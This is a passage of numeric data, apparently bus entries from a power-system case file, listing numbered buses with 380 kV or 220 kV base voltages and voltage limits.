0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1056, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1057, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1058, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1059, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1060, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1061, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1062, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1063, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1064, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1065, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1066, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1067, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1068, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1069, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1070, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1071, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1072, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1073, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1074, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1075, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1076, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1077, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1078, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1079, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1080, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1081, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1082, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1083, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1084, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1085, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1086, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1087, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1088, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1089, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1090, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1091, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1092, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1093, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1094, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1095, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1096, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1097, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1098, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1099, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1100, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1101, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1102, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1103, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1104, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1105, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1106, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1107, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1108, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1109, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1110, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1111, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1112, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1113, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1114, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1115, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1116, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1117, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1118, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1119, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1120, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1121, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1122, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1123, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1124, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1125, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1126, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1127, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1128, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1129, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1130, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1131, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1132, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1133, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1134, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1135, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1136, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1137, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1138, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1139, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1140, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1141, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1142, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1143, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1144, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1145, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1146, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1147, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1148, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1149, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1150, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1151, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1152, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1153, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1154, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1155, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1156, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1157, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1158, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1159, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1160, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1161, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1162, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1163, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1164, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1165, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1166, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1167, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1168, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1169, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1170, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1171, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1172, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1173, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1174, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1175, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1176, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1177, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1178, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1179, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1180, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1181, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1182, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1183, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1184, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1185, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1186, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1187, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1188, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1189, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1190, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1191, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1192, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1193, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1194, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1195, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1196, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1197, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1198, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1199, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1200, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1201, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1202, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1203, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1204, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1205, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1206, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1207, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1208, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1209, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1210, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1211, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1212, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1213, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1214, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1215, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1216, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1217, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1218, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1219, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1220, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1221, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1222, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1223, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1224, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1225, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1226, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1227, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1228, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1229, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1230, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1231, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1232, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1233, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1235, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1236, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1237, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1238, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1239, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1240, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1241, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1242, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1243, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1244, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1245, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1246, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1247, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1248, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1249, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1250, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1251, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1252, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1253, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1254, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1255, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1256, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1257, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1258, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1259, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1260, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1261, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1262, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1263, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1264, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1265, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1266, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1267, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1268, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1269, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1270, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1271, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1272, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1273, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1274, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1275, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1276, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1277, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1278, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1279, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1280, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1281, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1282, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1283, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1284, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1285, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1286, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1287, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1288, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1289, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1290, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1291, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1292, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1293, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1294, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1295, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1296, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1297, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1298, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1299, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1300, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1301, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1302, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1303, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1304, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1305, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1306, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1307, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1308, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1309, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1310, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1311, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1312, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1313, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1314, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1315, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1316, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1317, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1318, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1319, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1320, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1321, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1322, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1323, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1324, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1325, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1326, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1327, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1328, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1329, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1330, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1331, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1332, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1333, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1334, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1335, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1336, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1337, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1338, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1339, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1340, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1341, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1342, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1343, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1344, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1345, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1346, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1347, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1348, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1349, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1350, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1352, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1355, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1356, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1357, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1358, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1359, 2, 0, 0, 